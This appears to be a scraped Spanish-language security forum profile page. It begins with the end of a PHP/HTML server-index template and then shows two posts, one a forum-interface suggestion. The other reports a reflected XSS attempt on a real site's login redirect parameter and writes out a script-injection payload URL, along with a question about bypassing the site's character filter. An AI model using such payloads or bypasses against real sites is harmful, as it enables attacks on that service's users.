  525. }
  526.  
  527. ul.tools a {
  528.  
  529. 	background: url(index.php?img=pngWrench) 0 100% no-repeat;
  530.  
  531. }
  532.  
  533. dl {
  534.  
  535. 	margin: 0;
  536.  
  537. 	padding: 0;
  538.  
  539. }
  540.  
  541. dt {
  542.  
  543. 	font-weight: bold;
  544.  
  545. 	text-align: right;
  546.  
  547. 	width: 11em;
  548.  
  549. 	clear: both;
  550.  
  551. }
  552.  
  553. dd {
  554.  
  555. 	margin: -1.35em 0 0 12em;
  556.  
  557. 	padding-bottom: 0.4em;
  558.  
  559. 	overflow: auto;
  560.  
  561. }
  562.  
  563. dd ul li {
  564.  
  565. 	float: left;
  566.  
  567. 	display: block;
  568.  
  569. 	width: 16.5%;
  570.  
  571. 	margin: 0;
  572.  
  573. 	padding: 0 0 0 20px;
  574.  
  575. 	background: url(index.php?img=pngPlugin) 2px 50% no-repeat;
  576.  
  577. 	line-height: 1.6;
  578.  
  579. }
  580.  
  581. a {
  582.  
  583. 	color: #024378;
  584.  
  585. 	font-weight: bold;
  586.  
  587. 	text-decoration: none;
  588.  
  589. }
  590.  
  591. a:hover {
  592.  
  593. 	color: #04569A;
  594.  
  595. 	text-decoration: underline;
  596.  
  597. }
  598.  
  599. #foot {
  600.  
  601. 	text-align: center;
  602.  
  603. 	margin-top: 1.8em;
  604.  
  605. 	border-top: 1px solid #999;
  606.  
  607. 	padding-top: 1em;
  608.  
  609. 	font-size: 0.85em;
  610.  
  611. }
  612.  
  613.     </style>
  614.  
  615.     
  616.  
  617. 	<link rel="shortcut icon" href="index.php?img=favicon" type="image/ico" />
  618.  
  619.     <style type="text/css">
  620.  
  621. <!--
  622.  
  623. #Layer1 {
  624.  
  625. 	position:absolute;
  626.  
  627. 	width:86px;
  628.  
  629. 	height:20px;
  630.  
  631. 	z-index:1;
  632.  
  633. 	left: 604px;
  634.  
  635. 	top: 16px;
  636.  
  637. }
  638.  
  639. .Estilo1 {
  640.  
  641. 	color: #FF0000;
  642.  
  643. 	font-weight: bold;
  644.  
  645. }
  646.  
  647. -->
  648.  
  649.     </style>
  650.  
  651. </head>
  652.  
  653.  
  654.  
  655. <body>
  656.  
  657.  
  658. 	<div id="head">
  659.  
  660. 	</div>
  661.  
  662.  
  663.  
  664. 	<h2> {$langues[$langue]['titreConf']} </h2>
  665.  
  666.  
  667.  
  668. 	<dl class="content">
  669.  
  670. 		<dt>{$langues[$langue]['phpExt']}</dt> 
  671.  
  672. 		<dd>
  673.  
  674. 			<ul>
  675.  
  676. 			${phpExtContents}
  677.  
  678. 			</ul>
  679.  
  680. 		</dd>
  681.  
  682. 	</dl>
  683.  
  684. 	<h2>{$langues[$langue]['titrePage']}</h2>
  685.  
  686. 	$add
  687.  
  688. 	<h2>{$langues[$langue]['txtProjet']}</h2>
  689.  
  690. 	$projectContents
  691.  
  692. </body>
  693.  
  694. </html>
  695.  
  696. EOPAGE;
  697.  
  698. echo $pag;
  699.  
  700. ?>



bueno, cualquiera que sepa como conseguir otro dominio gratis, contacteme y lo agregamos ;)
les aviso que les robe un icono a elhacker.net para esta pagina xD!
49  Foros Generales / Sugerencias y dudas sobre el Foro / autor comentario en: 31 Enero 2010, 07:24 am
bueno, esto se me ocurrio mientras navegaba por los post de programacion en unos tutoriales de asm, pasa que yo pasaba rapido la barra de navegacion y si me ponia a leer un comentario por decir al azar y estaba bueno pero era largo y no alcanzaaba a ver su perfil tenia que ir para arriba ver quien ear y volver abajo, pero cuando volvia me perdia. y pasa que esto me paso varias veces. se me habia ocurrido como sugerencia de hacer algo tipo lo que tiene GMail cuando ves los mails que tienen muchas respuestas, q a un costadito se ve en distintos colores el nombre del contacto, es chiquitito y discrito, y si no le gusta a alguien se podria desactivar... espero criticas de la idea...
50  Seguridad Informática / Nivel Web / medio xss en fotolog en: 30 Enero 2010, 20:55 pm
buenas, taba navegando por fotolog asi me efeaban por reverse y vi esto:
http://account.fotolog.com/login?redirect=
me llamo la atencion y vi donde se guardava ese valor, era en un input del tipo hidden, asique puse:
http://account.fotolog.com/login?redirect=a%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

y vi que no sucedia nada, al ver el codigo fuente descubri que me borraba los caracteres "<" y ">", asique empece a intentar con "onevent" "onsubmit" "onload" con todo xD! pero no encontre nada, ahora sinceramente no me interesa fotolog, pero este tipo de vulknerabilidades tinee algun salteo? se entiende? osea hay forma de poner esos caracteres. este xss (porq es un xss nomas que me filtra ><) es tipo al que encontro fede_cp pero en el cambio de lenguaje...
Páginas: 1 2 3 4 [5] 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines